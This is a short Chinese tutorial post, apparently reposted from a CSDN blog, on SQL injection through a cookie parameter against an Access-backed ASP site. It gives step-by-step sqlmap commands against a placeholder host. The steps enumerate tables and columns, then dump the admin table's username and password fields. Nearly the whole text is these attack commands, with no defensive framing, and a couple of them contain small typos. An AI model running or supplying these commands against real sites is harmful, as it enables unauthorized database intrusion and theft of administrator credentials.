Cookie中转注入

注:此方法使用于access数据库,mysql、MSSQL数据库请在第二步获取站点当前数据库及数据库,方法与常规mysql、MSSQL注入一样,只不过在后面加上了“–level 2”这个参数,其他参数照常使用。

1.判断数据库,获取服务器,网站环境等参数

sqlmap.py -u http://www.xx.com/show.asp --cookie “id=187” --table --level 2

例:
sqlmap.py -u “http://www.xx.com/show.asp” --cookie “id=187” --talbe --level 2

2.获取字段

sqlmap.py -u http://www.xx.com/show.asp --cookie “id=187” --columns -T 数据表 --level 2

例:
sqlmap.py -u “http://www.xx.com/show.asp” --cookie “id=187” --columns -T admin --level 2

3.获取字段中的内容

sqlmap.py -u http://www.xx.com/show.asp --cookie “id=187” --dump -T 表名 -C “字段名1,字段名2” --level 2

例:
sqlmap.py -u “http://www.xx.com/show.asp” --cookie “id=187” --dump admin -C “username,password” --level 2

发布了35 篇原创文章 · 获赞 2 · 访问量 718

猜你喜欢

转载自blog.csdn.net/qq_42452926/article/details/104719651